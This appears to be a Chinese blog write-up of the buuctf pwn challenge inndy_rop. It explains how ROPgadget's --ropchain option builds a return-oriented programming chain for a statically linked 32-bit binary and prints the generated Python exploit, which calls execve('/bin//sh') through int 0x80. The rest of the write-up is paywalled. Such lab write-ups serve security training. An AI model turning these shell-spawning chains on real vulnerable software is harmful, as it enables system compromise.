静态链接ropchain利用 inndy_rop

ollydbg · 2023-8-14 20:45:34

在做题拼接pop_rdi_ret这种gadget的时候经常在想，是不是能整一个程序通过拼接程序中的gadtget来达到getshell的目的。今天做题的时候终于发现了原来ROPgadget中本身就实现了这种功能。

题目来源

buuctf——pwn——inndy_rop

参考链接

https://blog.csdn.net/Tokameine/article/details/120168519
https://trustfoundry.net/2019/07/18/basic-rop-techniques-and-tricks/

题目信息

32位程序，题目提示Ubuntu16
静态链接ropchain利用 inndy_rop - ollydbg_UltraDebug

IDA中显示900+函数，大概率是静态链接，没有使用动态链接

找了一圈没有找到system函数和execve函数
静态链接ropchain利用 inndy_rop - ollydbg_UltraDebug

这一点在patchelf的时候也得到了证实
静态链接ropchain利用 inndy_rop - ollydbg_UltraDebug

溢出点在overflow函数中
静态链接ropchain利用 inndy_rop - ollydbg_UltraDebug

解题思路

自己构造ropchain，通过int 80指令中断至内核态，进而通过[[系统调用表调用execve函数getshell。

关键步骤

利用下面的命令可以自动生成本静态链接程序的利用代码。

ROPgadget --binary rop --ropchain

可以自动生成ROPChain，参考链接2可以更好的理解下面的步骤。

[Asm] 纯文本查看 复制代码

ROP chain generation
===========================================================
 
- Step 1 -- Write-what-where gadgets
 
    [+] Gadget found: 0x8050cc5 mov dword ptr [esi], edi ; pop ebx ; pop esi ; pop edi ; ret
    [+] Gadget found: 0x8048433 pop esi ; ret
    [+] Gadget found: 0x8048480 pop edi ; ret
    [-] Can't find the 'xor edi, edi' gadget. Try with another 'mov [r], r'
 
    [+] Gadget found: 0x805466b mov dword ptr [edx], eax ; ret
    [+] Gadget found: 0x806ecda pop edx ; ret
    [+] Gadget found: 0x80b8016 pop eax ; ret
    [+] Gadget found: 0x80492d3 xor eax, eax ; ret
 
- Step 2 -- Init syscall number gadgets
 
    [+] Gadget found: 0x80492d3 xor eax, eax ; ret
    [+] Gadget found: 0x807a66f inc eax ; ret
 
- Step 3 -- Init syscall arguments gadgets
 
    [+] Gadget found: 0x80481c9 pop ebx ; ret
    [+] Gadget found: 0x80de769 pop ecx ; ret
    [+] Gadget found: 0x806ecda pop edx ; ret
 
- Step 4 -- Syscall gadget
 
    [+] Gadget found: 0x806c943 int 0x80
 
- Step 5 -- Build the ROP chain
 
 #!/usr/bin/env python3
# execve generated by ROPgadget
 
from struct import pack
 
# Padding goes here
p = b''
 
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080b8016) # pop eax ; ret
p += b'/bin'
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea064) # @ .data + 4
p += pack('<I', 0x080b8016) # pop eax ; ret
p += b'//sh'
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x080492d3) # xor eax, eax ; ret
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481c9) # pop ebx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080de769) # pop ecx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x080492d3) # xor eax, eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0806c943) # int 0x80

还有更多的精彩内容，作者设置为付费后可见

Noshiming · 3 天前

账号		自动登录	找回密码
密码			立即注册

[CTF] 静态链接ropchain利用 inndy_rop